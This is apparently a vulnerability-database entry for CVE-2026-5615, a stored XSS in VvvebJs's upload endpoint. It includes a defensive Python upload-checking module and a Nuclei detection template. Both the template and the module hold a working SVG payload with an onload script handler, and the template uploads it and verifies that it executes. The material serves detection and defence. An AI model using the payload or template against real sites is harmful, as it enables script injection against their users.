VvvebJs <= 2.0.5 - Cross-Site Scripting
CVE-2026-5615
Verified
Description
Givanz VvvebJs <= 2.0.5 contains a stored cross-site scripting (XSS) vulnerability: the "uploadAllowExtensions" argument of the upload.php file-upload endpoint can be manipulated, allowing a remote attacker to store a file whose script runs in the browser of anyone who loads it. Exploitation requires crafted input.
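The weakness described above is an upload endpoint that lets the request influence which extensions are accepted, after which the stored SVG is served back as image/svg+xml so its markup runs in the viewer's browser. The following Python module is an added illustration of the server-side controls that close that path; it is not VvvebJs code (the project is PHP) and the function names, the allowlist values and the sample SVG inputs are all constructed for this example. The hostile sample mirrors the onload-bearing SVG used by the template on this page as its probe.

```python
"""Defensive upload checks (added illustration, not part of VvvebJs).

Two controls, applied together:
1. The permitted-extension list is fixed on the server. Anything the client
   sends (an "uploadAllowExtensions"-style parameter) is ignored.
2. If SVG must be accepted, the file is parsed and refused when it carries
   script-capable content, and it is served with headers that deny it an
   executable context.
"""
import os
import re
import xml.etree.ElementTree as ET

# Hypothetical server-side allowlist chosen for this example; "svg" is included
# only so that the scanner below has something to examine.
SERVER_ALLOWED_EXTENSIONS = frozenset({"png", "jpg", "jpeg", "gif", "webp", "svg"})

# SVG content that can execute script or embed foreign documents.
_ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}
_URL_ATTRS = {"href", "src", "data"}
_DANGEROUS_SCHEME = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.I)


def extension_allowed(filename: str, client_allowlist=None) -> bool:
    """True only if the extension is on the server's fixed allowlist.

    client_allowlist models the request parameter the vulnerable endpoint
    trusted; it is accepted here purely to show that it is never consulted.
    """
    base = os.path.basename(filename)
    if "." not in base:
        return False
    ext = base.rsplit(".", 1)[1].lower()
    return ext in SERVER_ALLOWED_EXTENSIONS


def _local(name: str) -> str:
    """Strip an XML namespace prefix: '{ns}svg' -> 'svg'."""
    return name.rsplit("}", 1)[-1].lower()


def svg_active_content(data: bytes) -> list:
    """Return findings describing script-capable content in an SVG document.

    An empty list means nothing suspicious was found. Unparseable XML is
    reported as a finding because a lenient browser may still render it.
    """
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in _ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        for name, value in elem.attrib.items():
            lname = _local(name)
            if lname.startswith("on"):
                findings.append(f"event handler {lname} on <{tag}>")
            elif lname in _URL_ATTRS and _DANGEROUS_SCHEME.match(value):
                scheme = value.split(":", 1)[0].strip().lower()
                findings.append(f"{lname} with {scheme}: URL on <{tag}>")
    return findings


def accept_upload(filename: str, data: bytes, client_allowlist=None):
    """Decide whether an upload may be stored. Returns (accepted, reason)."""
    if not extension_allowed(filename, client_allowlist):
        return False, "extension not on server allowlist"
    if filename.lower().endswith(".svg"):
        findings = svg_active_content(data)
        if findings:
            return False, "svg contains active content: " + "; ".join(findings)
    return True, "ok"


def safe_download_headers(content_type: str) -> dict:
    """Response headers for serving a stored user file without a scripting context."""
    return {
        "Content-Type": content_type,
        "Content-Disposition": "attachment",  # download, never render inline
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed sample inputs. HOSTILE_SVG mirrors the probe used by the template above.
HOSTILE_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
  <text x="10" y="20">probe</text>
</svg>"""

BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#09f"/>
</svg>"""

if __name__ == "__main__":
    print(accept_upload("probe.svg", HOSTILE_SVG, client_allowlist="php,svg"))
    print(accept_upload("logo.svg", BENIGN_SVG))
    print(accept_upload("shell.php", b"<?php", client_allowlist="php"))
```

Running the module rejects the hostile SVG with the onload handler named in the reason, accepts the plain circle, and refuses the .php name even though the client "allowed" it. The scanner is an allowlist-of-safe-structure check rather than a blocklist of payload strings, which is why it keys on element names, on* attributes and URL schemes rather than on any particular alert() text.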
Severity
Medium
CVSS Score
4.3
Exploit Probability
1%
Published Date
April 6, 2026
Template Author
theamanrawat
CVE-2026-5615.yaml
id: CVE-2026-5615

info:
  name: VvvebJs <= 2.0.5 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Givanz Vvvebjs <= 2.0.5 contains a stored XSS caused by manipulation of the "uploadAllowExtensions" argument in upload.php File Upload Endpoint, letting remote attackers execute scripts, exploit requires crafted input.
  impact: |
    Remote attackers can execute arbitrary scripts, potentially leading to session hijacking or user impersonation.
  remediation: |
    Apply the patch 8cac22cff99b8bc701c408aa8e887fa702755336 or update to the fixed version.
  reference:
    - https://github.com/advisories/GHSA-p873-9x3v-gmvh
    - https://github.com/givanz/VvvebJs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-5615
    epss-score: 0.01254
    epss-percentile: 0.79606
    cwe-id: CWE-79
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.html:"VvvebJs"
  tags: cve,cve2026,xss,stored-xss,file-upload,svg,vvvebjs

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=--nuclei{{randstr_1}}

        ----nuclei{{randstr_1}}
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.svg"
        Content-Type: image/svg+xml

        <?xml version="1.0" standalone="no"?>
        <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
          <text x="10" y="20">{{randstr}}</text>
        </svg>
        ----nuclei{{randstr_1}}--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
        internal: true

    extractors:
      - type: regex
        name: upload_path
        part: body
        group: 0
        regex:
          - '/[a-zA-Z0-9_-]+\.svg'
        internal: true

  - raw:
      - |
        GET {{upload_path}} HTTP/1.1
        Host: {{Hostname}}

    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "{{randstr}}", "<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\">")'
          - 'contains(content_type, "image/svg+xml")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450221008e54eb8c16fb5570e2c0d281d55360166c9a8ee808658170c63388c0f0ae6fac02205f84c074165b1fec5c34ae2933aec71e1b1b0f1aca54ba3427a950f7fd6068e1:922c64590222798bb761d5b6d8e72950
Score
4.3
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
CVE ID:
CVE-2026-5615
CWE ID:
CWE-79
Remediation Steps
Apply the patch 8cac22cff99b8bc701c408aa8e887fa702755336 or update to the fixed version.